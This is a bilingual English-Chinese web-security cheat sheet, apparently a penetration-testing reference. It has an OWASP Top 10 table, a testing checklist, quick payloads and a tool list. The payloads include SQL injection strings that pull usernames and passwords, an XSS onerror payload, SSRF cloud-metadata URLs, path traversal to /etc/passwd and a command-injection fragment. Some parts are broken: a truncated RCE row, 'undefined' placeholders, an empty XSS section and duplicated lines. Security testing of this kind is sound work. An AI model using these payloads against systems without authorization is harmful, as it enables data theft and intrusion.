Web Security Expert

Web安全专家

OWASP Top 10 Quick Reference

OWASP Top 10快速参考

Vuln	Test	Payload Example
SQLi	`'` , `"` , `1 OR 1=1`	`' UNION SELECT null,username,password FROM users--`
XSS	`<script>` , event handlers	`<img src=x onerror=alert(1)>`
SSRF	Internal URLs	`http://127.0.0.1` , `http://169.254.169.254`
IDOR	Change IDs	`/api/user/123` → `/api/user/124`
LFI	Path traversal	`../../../etc/passwd`
RCE	Command chars	`; id` , `

漏洞	测试方法	Payload示例
SQLi	`'` , `"` , `1 OR 1=1`	`' UNION SELECT null,username,password FROM users--`
XSS	`<script>` 、事件处理器	`<img src=x onerror=alert(1)>`
SSRF	内部URL	`http://127.0.0.1` , `http://169.254.169.254`
IDOR	修改ID	`/api/user/123` → `/api/user/124`
LFI	路径遍历	`../../../etc/passwd`
RCE	命令字符	`; id` , `

Testing Checklist

测试清单

Authentication

身份验证

Brute force protection
Password reset flaws
Session fixation
JWT vulnerabilities

暴力破解防护
密码重置漏洞
会话固定
JWT漏洞

Authorization

授权

IDOR on all endpoints
Privilege escalation
Missing function level access

所有端点的IDOR
权限提升
缺失功能级访问控制

Input Validation

输入验证

SQLi all parameters
XSS reflected/stored
Command injection
File upload bypass

所有参数的SQLi测试
反射型/存储型XSS
命令注入
文件上传绕过

Quick Payloads

快速Payload

undefined

undefined

SQLi

' OR '1'='1 ' UNION SELECT null,null,null-- '; WAITFOR DELAY '0:0:5'--

XSS

SSRF

http://127.0.0.1:80 http://[::]:80 http://169.254.169.254/latest/meta-data/

LFI

....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd

undefined

....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd

undefined

Tools

工具

Purpose	Tool
Proxy	Burp Suite, OWASP ZAP
SQLi	sqlmap
XSS	XSStrike, dalfox
Fuzzing	ffuf, wfuzz

用途	工具
代理	Burp Suite, OWASP ZAP
SQLi测试	sqlmap
XSS测试	XSStrike, dalfox
模糊测试	ffuf, wfuzz

web-security-expert

Original

Translation

Web Security Expert

Web安全专家

OWASP Top 10 Quick Reference

OWASP Top 10快速参考

Testing Checklist

测试清单

Authentication

身份验证

Authorization

授权

Input Validation

输入验证

Quick Payloads

快速Payload

SQLi

SQLi

XSS

XSS

SSRF

SSRF

LFI

LFI

Tools

工具